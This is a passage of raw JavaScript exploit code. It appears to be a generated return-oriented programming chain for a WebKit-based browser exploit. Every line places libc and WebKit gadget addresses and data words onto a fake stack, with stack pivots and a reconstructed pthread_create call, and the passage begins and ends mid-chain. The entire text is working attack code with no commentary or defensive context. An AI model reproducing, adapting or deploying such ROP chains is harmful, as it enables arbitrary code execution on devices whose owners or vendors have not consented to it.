//mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+145456, //L2006 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+145488, //L2009 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L2006: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2008: db([16, 0]); // 0x10 set_gadget(webkit_base+568675,); //pop r8 //L2009: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+145592, //L2012 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+145576, //L2010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2010: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2012: db([0, 0]); // 0x0 set_gadgets([ libc_base+224144, //mov ax, [rdi] libc_base+764760, //pop rsi ropchain+145752, //L2016 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+145720, //L2014 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+145736, //L2015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2013: db([16, 0]); // 0x10 set_gadget(webkit_base+3236123,); //pop r9 //L2014: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2015: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2016: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+145808, //L2018 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2018: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+145936, //L2020 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+145952, //L2021 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+145920, //L2019 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2019: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2020: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2021: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+146112, //L2025 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+146080, //L2023 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+146096, //L2024 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2022: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L2023: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2024: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2025: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+146216, //L2027 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+146200, //L2026 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2026: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2027: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2028: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L2029: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+146424, //L2032 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+146408, //L2031 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2030: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L2031: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2032: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+146528, //L2034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+146512, //L2033 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2033: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2034: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+146608, //L2035 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2035: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2037: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+146728, //L2040 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+146712, //L2038 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2038: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2040: db([0, 0]); // 0x0 set_gadgets([ libc_base+224144, //mov ax, [rdi] libc_base+764760, //pop rsi ropchain+146888, //L2044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+146856, //L2042 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+146872, //L2043 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2041: db([16, 0]); // 0x10 set_gadget(webkit_base+3236123,); //pop r9 //L2042: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2043: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2044: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+146944, //L2046 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2046: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+147072, //L2048 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+147088, //L2049 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+147056, //L2047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2047: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2048: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2049: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+147248, //L2053 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+147216, //L2051 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+147232, //L2052 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2050: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L2051: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2052: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2053: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+147352, //L2055 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+147336, //L2054 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2054: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2055: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2056: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L2057: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+147552, //L2060 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+147536, //L2059 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2058: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L2059: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2060: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+147656, //L2062 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+147640, //L2061 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2061: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2062: db([0, 0]); // 0x0 set_gadgets([ libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+147768, //L2065 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+147752, //L2064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2063: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L2064: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2065: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+147832, //L2067 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+763368 //pop rcx ]); //L2067: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+147888, //L2068 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2068: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+148040, //L2071 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+148056, //L2072 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+148024, //L2070 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2070: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2071: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2072: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+148216, //L2076 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+148184, //L2074 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+148200, //L2075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2073: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L2074: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2075: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2076: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+148336, //L2077 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+148368, //L2079 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+148352, //L2078 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2077: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2078: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2079: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+148472, //L2080 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+148488, //L2081 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2080: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2081: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+148608, //L2082 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+148592, //L2083 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2083: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2082: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+148696, //L2085 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+148680, //L2084 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2084: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2085: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+148800, //L2086 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+148816, //L2087 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2086: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2087: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+148936, //L2088 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+148920, //L2089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2089: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2088: db([0, 0]); // 0x0 //_pthread_create__rop: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+149008, //L2091 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2091: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+149072, //L2093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2093: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([24, 0]); // 0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+149176, //L2094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+149192, //L2095 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2094: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2095: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2096: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2097: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+149320, //L2099 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+149304, //L2098 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2098: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2099: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2100: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2101: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L2102: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2103: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2105: db([4096, 0]); // 0x1000 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+149632, //L2106 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2106: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2108: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2110: db([2, 0]); // 0x2 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+149824, //L2111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2111: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+149936, //L2113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2113: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2114: db([65536, 0]); // 0x10000 set_gadget(libc_base+144605,); //pop rdi //L2115: db([65536, 0]); // 0x10000 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+150064, //L2117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+150048, //L2116 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2116: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2117: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2118: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L2120: ropchain+150216, //L2119 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+160336, //L2121 //L2119: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967248, 4294967295]); // -0x30 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+150312, //L2123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2123: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+150368, //L2124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2124: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2126: db([65536, 0]); // 0x10000 set_gadget(libc_base+763368,); //pop rcx //L2127: db([65536, 0]); // 0x10000 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+150520, //L2129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2129: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+150576, //L2130 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2130: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+150648, //L2132 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2132: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2134: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2135: db([312, 0]); // 0x138 set_gadget(libc_base+764760,); //pop rsi //L2137: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L2139: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+150864, //L2142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+150848, //L2140 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2140: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2142: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+151040, //L2145 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+151056, //L2146 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+151008, //L2143 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+151024, //L2144 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2143: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2144: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2145: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2146: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+151152, //L2148 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+151136, //L2147 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2147: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2148: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2149: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L2150: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+151376, //L2152 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+151392, //L2153 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+151360, //L2151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2151: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2152: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2153: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+151480, //L2154 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+151496, //L2156 